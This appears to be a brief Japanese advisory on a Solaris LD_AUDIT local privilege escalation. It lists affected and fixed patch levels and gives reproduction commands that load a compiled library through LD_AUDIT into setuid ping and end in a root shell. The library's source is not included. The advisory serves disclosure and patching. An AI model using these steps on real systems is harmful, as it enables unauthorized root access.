SPARC Platform:
Solaris 8 with patches 109147-31 through 109147-36 and without patch 109147-37
Solaris 9 with patches 112963-16 through 112963-21 and without patch 112963-22
Solaris 10 without patch 117461-04
x86 Platform
Solaris 8 with patches 109148-31 through 109148-36 and without patch 109148-37
Solaris 9 with patches 113986-12 through 113986-17 and without patch 113986-18
Solaris 10 without patch 118345-05
$ vi dupa.c
内容は、添付ファイルのソースコード
$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
$ setenv LD_AUDIT /tmp/dupa.so ※bashの場合は export LD_AUDIT=/tmp/dupa.so
$ ping
#
# id
uid=0(root) gid=1000(localusr)
#
パッチの適用
SPARC Platform
Solaris 8 with patch 109147-37 or later
Solaris 9 with patch 112963-22 or later
Solaris 10 with patch 117461-04 or later
x86 Platform
Solaris 8 with patch 109148-37 or later
Solaris 9 with patch 113986-18 or later
Solaris 10 with patch 118345-05 or later
ユーザの厳格な管理